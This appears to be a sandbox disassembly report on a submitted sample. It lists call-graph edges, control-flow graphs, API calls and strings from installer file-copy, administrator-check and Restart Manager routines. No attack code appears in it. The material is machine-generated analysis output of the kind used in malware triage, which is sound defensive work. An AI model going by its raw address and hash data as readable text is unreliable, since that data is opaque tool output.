50391 403490 50390->50391 50393 402660 4 API calls 50390->50393 50391->50364 50392->50390 50393->50391 50394->50372 50395->50374 50396->50379 50397 41ee54 50398 41ee63 IsWindowVisible 50397->50398 50399 41ee99 50397->50399 50398->50399 50400 41ee6d IsWindowEnabled 50398->50400 50400->50399 50401 41ee77 50400->50401 50402 402648 18 API calls 50401->50402 50403 41ee81 EnableWindow 50402->50403 50403->50399 50404 46bb10 50405 46bb44 50404->50405 50435 46bfad 50404->50435 50409 46bbdc 50405->50409 50410 46bbba 50405->50410 50411 46bbcb 50405->50411 50412 46bb98 50405->50412 50413 46bba9 50405->50413 50422 46bb80 50405->50422 50406 403400 4 API calls 50408 46bfec 50406->50408 50417 403400 4 API calls 50408->50417 50727 46baa0 59 API calls 50409->50727 50460 46b6d0 50410->50460 50726 46b890 81 API calls 50411->50726 50724 46b420 61 API calls 50412->50724 50725 46b588 56 API calls 50413->50725 50421 46bff4 50417->50421 50420 46bb9e 50420->50422 50420->50435 50422->50435 50495 468c74 50422->50495 50423 46bc18 50423->50435 50438 46bc5b 50423->50438 50728 494da0 50423->50728 50426 46bd7e 50747 48358c 137 API calls 50426->50747 50427 414ae8 18 API calls 50427->50438 50430 46bd99 50430->50435 50431 42cbc0 20 API calls 50431->50438 50432 46af68 37 API calls 50432->50438 50435->50406 50436 46bdd7 50513 469f1c 50436->50513 50437 46af68 37 API calls 50437->50435 50438->50426 50438->50427 50438->50431 50438->50432 50438->50435 50438->50436 50439 403450 18 API calls 50438->50439 50456 46be9f 50438->50456 50498 468bb0 50438->50498 50506 46acd4 50438->50506 50651 483084 50438->50651 50764 46b1dc 33 API calls 50438->50764 50439->50438 50441 46be3d 50442 403450 18 API calls 50441->50442 50443 46be4d 50442->50443 50444 46bea9 50443->50444 50445 46be59 50443->50445 50450 46bf6b 50444->50450 50574 46af68 50444->50574 50748 457f1c 50445->50748 50449 457f1c 38 API calls 50449->50456 50456->50437 50765 46c424 50460->50765 50463 46b852 50465 403420 4 API calls 50463->50465 50467 46b86c 
50465->50467 50466 46b71e 50468 46b83e 50466->50468 50772 455f84 27 API calls 50466->50772 50469 403400 4 API calls 50467->50469 50468->50463 50471 403450 18 API calls 50468->50471 50472 46b874 50469->50472 50471->50463 50473 403400 4 API calls 50472->50473 50474 46b87c 50473->50474 50474->50422 50475 46b801 50475->50463 50475->50468 50480 42cd48 21 API calls 50475->50480 50477 46b7a1 50477->50463 50477->50475 50782 42cd48 50477->50782 50479 46b73c 50479->50477 50773 466600 50479->50773 50482 46b817 50480->50482 50482->50468 50487 451458 18 API calls 50482->50487 50486 466600 33 API calls 50489 46b77c 50486->50489 50490 46b82e 50487->50490 50789 47efd0 56 API calls 50490->50789 50496 468bb0 33 API calls 50495->50496 50497 468c83 50496->50497 50497->50423 50499 468bdf 50498->50499 50500 4078f4 33 API calls 50499->50500 50503 468c20 50499->50503 50501 468c18 50500->50501 51042 453344 18 API calls 50501->51042 50504 403400 4 API calls 50503->50504 50505 468c38 50504->50505 50505->50438 50507 46ace5 50506->50507 50509 46ace0 50506->50509 51128 469a80 60 API calls 50507->51128 50508 46ace3 50508->50438 50509->50508 51043 46a740 50509->51043 50511 46aced 50511->50438 50514 403400 4 API calls 50513->50514 50515 469f4a 50514->50515 51505 47dd00 50515->51505 50517 469fad 50518 469fb1 50517->50518 50519 469fca 50517->50519 51512 466800 50518->51512 50521 469fbb 50519->50521 51515 494c90 18 API calls 50519->51515 50523 46a25e 50521->50523 50526 46a154 50521->50526 50527 46a0e9 50521->50527 50524 403420 4 API calls 50523->50524 50529 46a288 50524->50529 50525 469fe6 50525->50521 50530 469fee 50525->50530 50528 403494 4 API calls 50526->50528 50531 403494 4 API calls 50527->50531 50533 46a161 50528->50533 50529->50441 50534 46af68 37 API calls 50530->50534 50532 46a0f6 50531->50532 50535 40357c 18 API calls 50532->50535 50536 40357c 18 API calls 50533->50536 50543 469ffb 50534->50543 50537 46a103 50535->50537 50538 46a16e 50536->50538 50539 40357c 18 API calls 50537->50539 
50540 40357c 18 API calls 50538->50540 50541 46a110 50539->50541 50542 46a17b 50540->50542 50544 40357c 18 API calls 50541->50544 50545 40357c 18 API calls 50542->50545 50548 46a024 SetActiveWindow 50543->50548 50549 46a03c 50543->50549 50546 46a11d 50544->50546 50547 46a188 50545->50547 50550 466800 34 API calls 50546->50550 50551 40357c 18 API calls 50547->50551 50548->50549 51516 42f560 50549->51516 50552 46a12b 50550->50552 50553 46a196 50551->50553 50555 40357c 18 API calls 50552->50555 50556 414b18 18 API calls 50553->50556 50558 46a134 50555->50558 50559 46a152 50556->50559 50561 40357c 18 API calls 50558->50561 51533 466b38 50559->51533 50564 46a141 50561->50564 50563 46a08d 50566 46ade4 35 API calls 50563->50566 50565 414b18 18 API calls 50564->50565 50565->50559 50567 46a0bf 50566->50567 50567->50441 50575 468c74 33 API calls 50574->50575 50576 46af80 50575->50576 50577 46afa2 50576->50577 50578 4652cc 21 API calls 50576->50578 51729 4652cc 50577->51729 50578->50577 50582 46afba 50583 46ade4 35 API calls 50582->50583 50584 46aff2 50583->50584 50585 414b18 18 API calls 50584->50585 50586 46b006 50585->50586 50587 46b012 50586->50587 50588 46b03c 50586->50588 50589 414b18 18 API calls 50587->50589 50591 46b05b 50588->50591 50592 46b085 50588->50592 50590 46b026 50589->50590 50593 414b18 18 API calls 50590->50593 50594 414b18 18 API calls 50591->50594 50595 414b18 18 API calls 50592->50595 50597 46b03a 50593->50597 50598 46b06f 50594->50598 50596 46b099 50595->50596 50599 414b18 18 API calls 50596->50599 51746 46acfc 50597->51746 50600 414b18 18 API calls 50598->50600 50599->50597 50600->50597 50652 46c424 62 API calls 50651->50652 50653 4830c7 50652->50653 50654 4830d0 50653->50654 52016 408be0 19 API calls 50653->52016 50656 414ae8 18 API calls 50654->50656 50657 4830e0 50656->50657 50658 403450 18 API calls 50657->50658 50659 4830ed 50658->50659 51818 46c77c 50659->51818 50662 4830fd 50664 414ae8 18 API calls 50662->50664 50665 48310d 50664->50665 50666 
403450 18 API calls 50665->50666 50667 48311a 50666->50667 50668 469868 SendMessageA 50667->50668 50669 483133 50668->50669 50670 483184 50669->50670 52018 479e18 37 API calls 50669->52018 51847 4241dc IsIconic 50670->51847 50674 48319f SetActiveWindow 50675 4831b4 50674->50675 51855 4824b4 50675->51855 50724->50420 50725->50422 50726->50422 50727->50422 53671 43d9c8 50728->53671 50731 494dcc 53676 431bd0 50731->53676 50732 494e52 50733 494e61 50732->50733 53709 4945c8 18 API calls 50732->53709 50733->50438 50742 494e16 53707 49465c 18 API calls 50742->53707 50744 494e2a 53708 433dd0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50744->53708 50746 494e4a 50746->50438 50747->50430 50749 457f41 50748->50749 50750 457f61 50749->50750 50751 4078f4 33 API calls 50749->50751 50752 403400 4 API calls 50750->50752 50753 457f59 50751->50753 50754 457f76 50752->50754 50755 457d10 38 API calls 50753->50755 50754->50449 50755->50750 50764->50438 50790 46c4bc 50765->50790 50768 414ae8 50769 414af6 50768->50769 50770 4034e0 18 API calls 50769->50770 50771 414b03 50770->50771 50771->50466 50772->50479 50774 46661a 50773->50774 50993 4078f4 50774->50993 51036 42cccc 50782->51036 50785 451458 50786 451428 18 API calls 50785->50786 50787 451474 50786->50787 50788 47efd0 56 API calls 50787->50788 50788->50475 50789->50468 50791 414ae8 18 API calls 50790->50791 50792 46c4f0 50791->50792 50851 466898 50792->50851 50796 46c502 50797 46c511 50796->50797 50800 46c52a 50796->50800 50920 47efd0 56 API calls 50797->50920 50799 403420 4 API calls 50802 46b702 50799->50802 50801 46c571 50800->50801 50803 46c558 50800->50803 50804 46c5d6 50801->50804 50809 46c575 50801->50809 50802->50463 50802->50768 50921 47efd0 56 API calls 50803->50921 50923 42cb4c CharNextA 50804->50923 50807 46c5e5 50808 46c5e9 50807->50808 50813 46c602 50807->50813 50924 47efd0 56 API calls 50808->50924 50811 46c5bd 50809->50811 50809->50813 50922 47efd0 56 API calls 50811->50922 50812 46c626 50925 47efd0 56 API calls 
50812->50925 50813->50812 50865 466a08 50813->50865 50818 46c525 50818->50799 50821 46c63f 50873 403778 50821->50873 50826 46c666 50926 466a94 18 API calls 50826->50926 50827 46c697 50884 42c8cc 50827->50884 50830 46c679 50832 451458 18 API calls 50830->50832 50834 46c686 50832->50834 50927 47efd0 56 API calls 50834->50927 50855 4668b2 50851->50855 50852 406bb0 18 API calls 50852->50855 50854 42cbc0 20 API calls 50854->50855 50855->50852 50855->50854 50856 403450 18 API calls 50855->50856 50857 4668fb 50855->50857 50930 42caac 50855->50930 50856->50855 50858 403420 4 API calls 50857->50858 50859 466915 50858->50859 50860 414b18 50859->50860 50861 414ae8 18 API calls 50860->50861 50862 414b3c 50861->50862 50863 403400 4 API calls 50862->50863 50864 414b6d 50863->50864 50864->50796 50866 466a12 50865->50866 50867 466a25 50866->50867 50946 42cb3c CharNextA 50866->50946 50867->50812 50869 466a38 50867->50869 50870 466a42 50869->50870 50871 466a6f 50870->50871 50947 42cb3c CharNextA 50870->50947 50871->50812 50871->50821 50874 4037aa 50873->50874 50875 40377d 50873->50875 50876 403400 4 API calls 50874->50876 50875->50874 50877 403791 50875->50877 50879 4037a0 50876->50879 50878 4034e0 18 API calls 50877->50878 50878->50879 50880 42c99c 50879->50880 50881 42c9f5 50880->50881 50882 42c9b2 50880->50882 50881->50826 50881->50827 50882->50881 50948 42cb3c CharNextA 50882->50948 50949 42c674 50884->50949 50920->50818 50921->50818 50922->50818 50923->50807 50924->50818 50925->50818 50926->50830 50927->50818 50931 403494 4 API calls 50930->50931 50932 42cabc 50931->50932 50933 403744 18 API calls 50932->50933 50935 42caf2 50932->50935 50939 42c444 IsDBCSLeadByte 50932->50939 50933->50932 50936 42cb36 50935->50936 50940 4037b8 50935->50940 50945 42c444 IsDBCSLeadByte 50935->50945 50936->50855 50939->50932 50941 403744 18 API calls 50940->50941 50943 4037c6 50941->50943 50942 4037fc 50942->50935 50943->50942 50944 4038a4 18 API calls 50943->50944 50944->50942 50945->50935 
Strings
• Will register the file (a type library) later., xrefs: 00471513
• Stripped read-only attribute., xrefs: 00470EC7
• Dest filename: %s, xrefs: 00470894
• Non-default bitness: 32-bit, xrefs: 004708BB
• Time stamp of our file: %s, xrefs: 0047099B
• Time stamp of existing file: %s, xrefs: 00470A2B
• Version of existing file: %u.%u.%u.%u, xrefs: 00470B7C
• Existing file's SHA-1 hash matches our file. Skipping., xrefs: 00470CB5
• @, xrefs: 004707B0
• Failed to strip read-only attribute., xrefs: 00470ED3
• Will register the file (a DLL/OCX) later., xrefs: 0047151F
• Existing file has a later time stamp. Skipping., xrefs: 00470DCF
• Non-default bitness: 64-bit, xrefs: 004708AF
• Same time stamp. Skipping., xrefs: 00470D55
• Same version. Skipping., xrefs: 00470CE5
• Installing into GAC, xrefs: 00471714
• Dest file exists., xrefs: 004709BB
• Installing the file., xrefs: 00470F09
• Version of our file: %u.%u.%u.%u, xrefs: 00470AF0
• Uninstaller requires administrator: %s, xrefs: 0047118F
• Version of existing file: (none), xrefs: 00470CFA
• .tmp, xrefs: 00470FB7
• Failed to read existing file's SHA-1 hash. Proceeding., xrefs: 00470CD0
• Existing file is a newer version. Skipping., xrefs: 00470C02
                                                                                            • Skipping due to "onlyifdoesntexist" flag., xrefs: 004709CE
                                                                                            • Couldn't read time stamp. Skipping., xrefs: 00470D35
                                                                                            • Time stamp of our file: (failed to read), xrefs: 004709A7
                                                                                            • Existing file's SHA-1 hash is different from our file. Proceeding., xrefs: 00470CC4
                                                                                            • , xrefs: 00470BCF, 00470DA0, 00470E1E
                                                                                            • Time stamp of existing file: (failed to read), xrefs: 00470A37
                                                                                            • User opted not to overwrite the existing file. Skipping., xrefs: 00470E4D
                                                                                            • Incrementing shared file count (32-bit)., xrefs: 004715A5
                                                                                            • Incrementing shared file count (64-bit)., xrefs: 0047158C
                                                                                            • Existing file is protected by Windows File Protection. Skipping., xrefs: 00470DEC
                                                                                            • User opted not to strip the existing file's read-only attribute. Skipping., xrefs: 00470E96
                                                                                            • Version of our file: (none), xrefs: 00470AFC
                                                                                            • -- File entry --, xrefs: 004706FB
                                                                                            • Dest file is protected by Windows File Protection., xrefs: 004708ED
                                                                                            • InUn, xrefs: 0047115F
                                                                                            • Skipping due to "onlyifdestfileexists" flag., xrefs: 00470EFA
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: $-- File entry --$.tmp$@$Couldn't read time stamp. Skipping.$Dest file exists.$Dest file is protected by Windows File Protection.$Dest filename: %s$Existing file has a later time stamp. Skipping.$Existing file is a newer version. Skipping.$Existing file is protected by Windows File Protection. Skipping.$Existing file's SHA-1 hash is different from our file. Proceeding.$Existing file's SHA-1 hash matches our file. Skipping.$Failed to read existing file's SHA-1 hash. Proceeding.$Failed to strip read-only attribute.$InUn$Incrementing shared file count (32-bit).$Incrementing shared file count (64-bit).$Installing into GAC$Installing the file.$Non-default bitness: 32-bit$Non-default bitness: 64-bit$Same time stamp. Skipping.$Same version. Skipping.$Skipping due to "onlyifdestfileexists" flag.$Skipping due to "onlyifdoesntexist" flag.$Stripped read-only attribute.$Time stamp of existing file: %s$Time stamp of existing file: (failed to read)$Time stamp of our file: %s$Time stamp of our file: (failed to read)$Uninstaller requires administrator: %s$User opted not to overwrite the existing file. Skipping.$User opted not to strip the existing file's read-only attribute. Skipping.$Version of existing file: %u.%u.%u.%u$Version of existing file: (none)$Version of our file: %u.%u.%u.%u$Version of our file: (none)$Will register the file (a DLL/OCX) later.$Will register the file (a type library) later.
                                                                                            • API String ID: 0-4021121268
                                                                                            • Opcode ID: cebd1a573a13cfb1480ab73f2a07467b13e4d984594641078933206a2f2f5451
                                                                                            • Instruction ID: 04e5041402f80353ef90c659d92e8d378e84d4fed116f8838aecbbc27e5febe3
                                                                                            • Opcode Fuzzy Hash: cebd1a573a13cfb1480ab73f2a07467b13e4d984594641078933206a2f2f5451
                                                                                            • Instruction Fuzzy Hash: 31927574A0424CDFDB21DFA9C445BDDBBB5AF05304F1480ABE848A7392D7789E49CB19

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1578 42e09c-42e0ad 1579 42e0b8-42e0dd AllocateAndInitializeSid 1578->1579 1580 42e0af-42e0b3 1578->1580 1581 42e287-42e28f 1579->1581 1582 42e0e3-42e100 GetVersion 1579->1582 1580->1581 1583 42e102-42e117 GetModuleHandleA GetProcAddress 1582->1583 1584 42e119-42e11b 1582->1584 1583->1584 1585 42e142-42e15c GetCurrentThread OpenThreadToken 1584->1585 1586 42e11d-42e12b CheckTokenMembership 1584->1586 1589 42e193-42e1bb GetTokenInformation 1585->1589 1590 42e15e-42e168 GetLastError 1585->1590 1587 42e131-42e13d 1586->1587 1588 42e269-42e27f FreeSid 1586->1588 1587->1588 1591 42e1d6-42e1fa call 402648 GetTokenInformation 1589->1591 1592 42e1bd-42e1c5 GetLastError 1589->1592 1593 42e174-42e187 GetCurrentProcess OpenProcessToken 1590->1593 1594 42e16a-42e16f call 4031bc 1590->1594 1605 42e208-42e210 1591->1605 1606 42e1fc-42e206 call 4031bc * 2 1591->1606 1592->1591 1595 42e1c7-42e1d1 call 4031bc * 2 1592->1595 1593->1589 1598 42e189-42e18e call 4031bc 1593->1598 1594->1581 1595->1581 1598->1581 1607 42e212-42e213 1605->1607 1608 42e243-42e261 call 402660 CloseHandle 1605->1608 1606->1581 1611 42e215-42e228 EqualSid 1607->1611 1615 42e22a-42e237 1611->1615 1616 42e23f-42e241 1611->1616 1615->1616 1619 42e239-42e23d 1615->1619 1616->1608 1616->1611 1619->1608
                                                                                            APIs
                                                                                            • AllocateAndInitializeSid.ADVAPI32(00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E0D6
                                                                                            • GetVersion.KERNEL32(00000000,0042E280,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E0F3
                                                                                            • GetModuleHandleA.KERNEL32(advapi32.dll,CheckTokenMembership,00000000,0042E280,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E10C
                                                                                            • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042E112
                                                                                            • CheckTokenMembership.KERNELBASE(00000000,00000000,?,00000000,0042E280,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E127
                                                                                            • FreeSid.ADVAPI32(00000000,0042E287,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E27A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressAllocateCheckFreeHandleInitializeMembershipModuleProcTokenVersion
                                                                                            • String ID: CheckTokenMembership$advapi32.dll
                                                                                            • API String ID: 2252812187-1888249752
                                                                                            • Opcode ID: a9f409996ddfe82e0213da269ff1de212d34eb3ec341ac20085b7d7d2472ef68
                                                                                            • Instruction ID: e5677345bf142a8b1d9111380f95962c8bb8cf61ba8e960ca5c3fd0f127139eb
                                                                                            • Opcode Fuzzy Hash: a9f409996ddfe82e0213da269ff1de212d34eb3ec341ac20085b7d7d2472ef68
                                                                                            • Instruction Fuzzy Hash: E351A271B44215EEEB10EAE69C42BBF77ACEB09704F9404BBB901F7281D57C99018B79

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1642 4502c0-4502cd 1643 4502d3-4502e0 GetVersion 1642->1643 1644 45037c-450386 1642->1644 1643->1644 1645 4502e6-4502fc LoadLibraryA 1643->1645 1645->1644 1646 4502fe-450377 GetProcAddress * 6 1645->1646 1646->1644
                                                                                            APIs
                                                                                            • GetVersion.KERNEL32(00480B52), ref: 004502D3
                                                                                            • LoadLibraryA.KERNEL32(Rstrtmgr.dll,00480B52), ref: 004502EB
                                                                                            • GetProcAddress.KERNEL32(6EAB0000,RmStartSession), ref: 00450309
                                                                                            • GetProcAddress.KERNEL32(6EAB0000,RmRegisterResources), ref: 0045031E
                                                                                            • GetProcAddress.KERNEL32(6EAB0000,RmGetList), ref: 00450333
                                                                                            • GetProcAddress.KERNEL32(6EAB0000,RmShutdown), ref: 00450348
                                                                                            • GetProcAddress.KERNEL32(6EAB0000,RmRestart), ref: 0045035D
                                                                                            • GetProcAddress.KERNEL32(6EAB0000,RmEndSession), ref: 00450372
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$LibraryLoadVersion
                                                                                            • String ID: RmEndSession$RmGetList$RmRegisterResources$RmRestart$RmShutdown$RmStartSession$Rstrtmgr.dll
                                                                                            • API String ID: 1968650500-3419246398
                                                                                            • Opcode ID: 2681632e5309952c30eea3f8c2bf2722b4339596373eceda0d07b93e3cd0d7e4
                                                                                            • Instruction ID: c77cef2ad5653e61b65a4477cbb73d0d56cf7b8a9d174f96be3e9b6947252677
                                                                                            • Opcode Fuzzy Hash: 2681632e5309952c30eea3f8c2bf2722b4339596373eceda0d07b93e3cd0d7e4
                                                                                            • Instruction Fuzzy Hash: B211F7B4510301DBD710FB61BF45A2E36E9E728315B08063FE804961A2CB7C4844CF8C

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1790 423c0c-423c40 1791 423c42-423c43 1790->1791 1792 423c74-423c8b call 423b68 1790->1792 1793 423c45-423c61 call 40b24c 1791->1793 1798 423cec-423cf1 1792->1798 1799 423c8d 1792->1799 1819 423c63-423c6b 1793->1819 1820 423c70-423c72 1793->1820 1800 423cf3 1798->1800 1801 423d27-423d2c 1798->1801 1802 423c93-423c96 1799->1802 1803 423d50-423d60 1799->1803 1809 423fb1-423fb9 1800->1809 1810 423cf9-423d01 1800->1810 1804 423d32-423d35 1801->1804 1805 42409a-4240a8 IsIconic 1801->1805 1811 423cc5-423cc8 1802->1811 1812 423c98 1802->1812 1807 423d62-423d67 1803->1807 1808 423d6b-423d73 call 424194 1803->1808 1813 4240d6-4240eb call 424850 1804->1813 1814 423d3b-423d3c 1804->1814 1815 424152-42415a 1805->1815 1824 4240ae-4240b9 GetFocus 1805->1824 1821 423d78-423d80 call 4241dc 1807->1821 1822 423d69-423d8c call 423b84 1807->1822 1808->1815 1809->1815 1816 423fbf-423fca call 4181e0 1809->1816 1825 423f13-423f3a SendMessageA 1810->1825 1826 423d07-423d0c 1810->1826 1817 423da9-423db0 1811->1817 1818 423cce-423ccf 1811->1818 1827 423df6-423e06 call 423b84 1812->1827 1828 423c9e-423ca1 1812->1828 1813->1815 1831 423d42-423d45 1814->1831 1832 4240ed-4240f4 1814->1832 1829 424171-424177 1815->1829 1816->1815 1878 423fd0-423fdf call 4181e0 IsWindowEnabled 1816->1878 1817->1815 1841 423db6-423dbd 1817->1841 1842 423cd5-423cd8 1818->1842 1843 423f3f-423f46 1818->1843 1819->1829 1820->1792 1820->1793 1821->1815 1822->1815 1824->1815 1836 4240bf-4240c8 call 41eff4 1824->1836 1825->1815 1844 423d12-423d13 1826->1844 1845 42404a-424055 1826->1845 1827->1815 1837 423ca7-423caa 1828->1837 1838 423e1e-423e3a PostMessageA call 423b84 1828->1838 1847 424120-424127 1831->1847 1848 423d4b 1831->1848 1858 4240f6-424109 call 4244d4 1832->1858 1859 42410b-42411e call 42452c 1832->1859 1836->1815 1891 4240ce-4240d4 SetFocus 1836->1891 1855 423cb0-423cb3 1837->1855 1856 423ea5-423eac 
1837->1856 1838->1815 1841->1815 1861 423dc3-423dc9 1841->1861 1862 423cde-423ce1 1842->1862 1863 423e3f-423e5f call 423b84 1842->1863 1843->1815 1851 423f4c-423f51 call 404e54 1843->1851 1864 424072-42407d 1844->1864 1865 423d19-423d1c 1844->1865 1845->1815 1849 42405b-42406d 1845->1849 1882 42413a-424149 1847->1882 1883 424129-424138 1847->1883 1866 42414b-42414c call 423b84 1848->1866 1849->1815 1851->1815 1873 423cb9-423cba 1855->1873 1874 423dce-423ddc IsIconic 1855->1874 1875 423eae-423ec1 call 423b14 1856->1875 1876 423edf-423ef0 call 423b84 1856->1876 1858->1815 1859->1815 1861->1815 1879 423ce7 1862->1879 1880 423e0b-423e19 call 424178 1862->1880 1906 423e83-423ea0 call 423a84 PostMessageA 1863->1906 1907 423e61-423e7e call 423b14 PostMessageA 1863->1907 1864->1815 1867 424083-424095 1864->1867 1884 423d22 1865->1884 1885 423f56-423f5e 1865->1885 1903 424151 1866->1903 1867->1815 1892 423cc0 1873->1892 1893 423d91-423d99 1873->1893 1899 423dea-423df1 call 423b84 1874->1899 1900 423dde-423de5 call 423bc0 1874->1900 1922 423ed3-423eda call 423b84 1875->1922 1923 423ec3-423ecd call 41ef58 1875->1923 1916 423ef2-423ef8 call 41eea4 1876->1916 1917 423f06-423f0e call 423a84 1876->1917 1878->1815 1924 423fe5-423ff4 call 4181e0 IsWindowVisible 1878->1924 1879->1866 1880->1815 1882->1815 1883->1815 1884->1866 1885->1815 1890 423f64-423f6b 1885->1890 1890->1815 1908 423f71-423f80 call 4181e0 IsWindowEnabled 1890->1908 1891->1815 1892->1866 1893->1815 1909 423d9f-423da4 call 422c4c 1893->1909 1899->1815 1900->1815 1903->1815 1906->1815 1907->1815 1908->1815 1937 423f86-423f9c call 412310 1908->1937 1909->1815 1935 423efd-423f00 1916->1935 1917->1815 1922->1815 1923->1922 1924->1815 1942 423ffa-424045 GetFocus call 4181e0 SetFocus call 415240 SetFocus 1924->1942 1935->1917 1937->1815 1946 423fa2-423fac 1937->1946 1942->1815 1946->1815
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 22958418fcb5307417e2cb8c5b21c835fdc4d5c2778e3f26f52eb9817f6a2da5
                                                                                            • Instruction ID: afb4f91cf4018cf9acc1c9974f14325182323c15c0e0405bd0f9b005e596376e
                                                                                            • Opcode Fuzzy Hash: 22958418fcb5307417e2cb8c5b21c835fdc4d5c2778e3f26f52eb9817f6a2da5
                                                                                            • Instruction Fuzzy Hash: 03E1AE31700124EFDB04DF69E989AADB7B5FB54300FA440AAE5559B352C73CEE81DB09

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 2133 4673a4-4673ba 2134 4673c4-46747b call 49577c call 402b30 * 6 2133->2134 2135 4673bc-4673bf call 402d30 2133->2135 2152 46747d-4674a4 call 41463c 2134->2152 2153 4674b8-4674d1 2134->2153 2135->2134 2157 4674a6 2152->2157 2158 4674a9-4674b3 call 4145fc 2152->2158 2159 4674d3-4674fa call 41461c 2153->2159 2160 46750e-46751c call 495a84 2153->2160 2157->2158 2158->2153 2166 4674ff-467509 call 4145dc 2159->2166 2167 4674fc 2159->2167 2168 46751e-46752d call 4958cc 2160->2168 2169 46752f-467531 call 4959f0 2160->2169 2166->2160 2167->2166 2174 467536-467589 call 4953e0 call 41a3d0 * 2 2168->2174 2169->2174 2181 46759a-4675af call 451458 call 414b18 2174->2181 2182 46758b-467598 call 414b18 2174->2182 2187 4675b4-4675bb 2181->2187 2182->2187 2189 467603-467a89 call 49581c call 495b40 call 41461c * 3 call 4146bc call 4145dc * 3 call 460bfc call 460c14 call 460c20 call 460c68 call 460bfc call 460c14 call 460c20 call 460c68 call 460c14 call 460c68 LoadBitmapA call 41d6b0 call 460c38 call 460c50 call 467180 call 468c94 call 466800 call 40357c call 414b18 call 466b38 call 466b40 call 466800 call 40357c * 2 call 414b18 call 468c94 call 466800 call 414b18 call 466b38 call 466b40 call 414b18 * 2 call 468c94 call 414b18 * 2 call 466b38 call 4145fc call 466b38 call 4145fc call 468c94 call 414b18 call 466b38 call 466b40 call 468c94 call 414b18 call 466b38 call 4145fc * 2 call 414b18 call 466b38 call 4145fc 2187->2189 2190 4675bd-4675fe call 4146bc call 414700 call 420f98 call 420fc4 call 420b68 call 420b94 2187->2190 2320 467ae5-467afe call 414a44 * 2 2189->2320 2321 467a8b-467ae3 call 4145fc call 414b18 call 466b38 call 4145fc 2189->2321 2190->2189 2329 467b03-467bb4 call 466800 call 468c94 call 466800 call 414b18 call 495b40 call 466b38 2320->2329 2321->2329 2347 467bb6-467bd1 2329->2347 2348 467bee-467e24 call 466800 call 414b18 call 495b50 * 2 call 42e8c0 call 
APIs
  • Part of subcall function 004958CC: GetWindowRect.USER32(00000000), ref: 004958E2
